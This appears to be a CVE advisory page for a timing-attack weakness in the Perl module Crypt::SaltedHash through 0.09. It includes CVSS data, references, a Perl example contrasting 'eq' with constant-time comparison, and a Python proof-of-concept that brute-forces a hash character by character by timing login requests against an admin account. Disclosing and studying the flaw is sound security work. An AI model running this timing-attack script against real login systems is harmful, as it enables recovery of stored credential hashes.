Security Vulnerability Report
CVE-2026-47373 CVSS 7.5 HIGH

CVE-2026-47373

Published: 2026-05-20 21:16:18
Last Modified: 2026-05-21 16:04:54
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Crypt::SaltedHash versions through 0.09 for Perl are susceptible to timing attacks. These versions compare hashes with Perl's built-in eq operator, which stops at the first differing byte, so discrepancies in timing could be used to guess the underlying hash.
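The comparison pattern the description names, beside a constant-time alternative, as an added Perl example; this is not Crypt::SaltedHash's own code or its 0.10 fix, and the storage layout (raw SHA-256 digest followed by a 4-byte salt), the helper names and the demonstration values are assumptions made for the illustration:

```perl
# Added example, not Crypt::SaltedHash's own code: a salted-hash validator
# written with Perl's 'eq' (the pattern the advisory describes) and the same
# validator with a constant-time byte comparison.
use strict;
use warnings;
use Digest::SHA qw(sha256);

# Assumed storage layout for this example: raw SHA-256 digest of
# (password . salt), followed by a fixed-length salt.
use constant { DIGEST_LEN => 32, SALT_LEN => 4 };

sub make_salted {
    my ($password, $salt) = @_;
    die "salt must be " . SALT_LEN . " bytes\n" unless length($salt) == SALT_LEN;
    return sha256($password . $salt) . $salt;
}

# Vulnerable pattern: 'eq' stops at the first differing byte, so the time a
# failed check takes depends on how long the matching prefix is.
sub validate_eq {
    my ($stored, $password) = @_;
    my $salt = substr($stored, DIGEST_LEN);
    return make_salted($password, $salt) eq $stored ? 1 : 0;
}

# Hardened pattern: OR together the XOR of every byte pair, so the loop does
# the same work whether the mismatch is at byte 0 or byte 35. The length check
# comes first because the length of a stored digest is not secret.
sub bytes_equal {
    my ($x, $y) = @_;
    return 0 if length($x) != length($y);
    my $diff = 0;
    $diff |= ord(substr($x, $_, 1)) ^ ord(substr($y, $_, 1)) for 0 .. length($x) - 1;
    return $diff == 0 ? 1 : 0;
}

sub validate_constant_time {
    my ($stored, $password) = @_;
    return 0 unless length($stored) == DIGEST_LEN + SALT_LEN;
    my $salt = substr($stored, DIGEST_LEN);
    return bytes_equal(make_salted($password, $salt), $stored);
}

# Constructed demonstration values, not taken from the advisory.
my $stored = make_salted("correct horse", "s4lt");
printf "eq check, right password:            %d\n", validate_eq($stored, "correct horse");
printf "constant-time check, right password: %d\n", validate_constant_time($stored, "correct horse");
printf "constant-time check, wrong password: %d\n", validate_constant_time($stored, "battery staple");
```

Both validators return 1 for the right password and 0 for the wrong one; only the second takes the same time for every wrong password of the correct length.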

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Crypt::SaltedHash <= 0.09

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for Timing Attack on Crypt::SaltedHash (Conceptual)
import requests
import time
import string

# Target endpoint (Hypothetical)
TARGET_URL = "http://vulnerable-app/login"

# Assume we know the hash format and length (e.g., SHA-256 hex: 64 chars)
HASH_LENGTH = 64
CHARSET = string.hexdigits

# Variable to store the recovered hash
recovered_hash = ""

print("[+] Starting Timing Attack...")

for i in range(HASH_LENGTH):
    best_char = None
    max_time = -1

    for char in CHARSET:
        # Construct payload: known prefix + current guess + padding
        # The padding ensures the comparison length is consistent if not checking length first
        test_hash = recovered_hash + char + "0" * (HASH_LENGTH - len(recovered_hash) - 1)
        payload = {"username": "admin", "password_hash": test_hash}

        # Measure request time
        start_time = time.time()
        try:
            requests.post(TARGET_URL, data=payload, timeout=5)
            end_time = time.time()
        except requests.RequestException:
            # Network error or timeout: still record the elapsed time
            end_time = time.time()

        duration = end_time - start_time

        # If this character took longer, it's likely the correct match
        if duration > max_time:
            max_time = duration
            best_char = char

    if best_char:
        recovered_hash += best_char
        print(f"[+] Position {i+1}/{HASH_LENGTH}: Found char '{best_char}' (Time: {max_time:.5f}s)")
    else:
        print("[-] Attack failed or network instability detected.")
        break

print(f"[+] Recovered Hash: {recovered_hash}")

References

https://github.com/robrwo/perl-Crypt-SaltedHash/commit/c07bfc5c23185b0667233d0f2e1252d81f1f027a.patch (upstream commit patch)
https://metacpan.org/release/RRWO/Crypt-SaltedHash-0.10/changes (Crypt::SaltedHash 0.10 changelog)
http://www.openwall.com/lists/oss-security/2026/05/20/21 (oss-security list post)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-47373", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-20T21:16:17.853", "lastModified": "2026-05-21T16:04:53.813", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Crypt::SaltedHash versions through 0.09 for Perl is susceptible to timing attacks.\n\nThese versions use Perl's built-in eq comparison. Discrepencies in timing could be used to guess the underlying hash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-208"}]}], "references": [{"url": "https://github.com/robrwo/perl-Crypt-SaltedHash/commit/c07bfc5c23185b0667233d0f2e1252d81f1f027a.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/RRWO/Crypt-SaltedHash-0.10/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/20/21", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}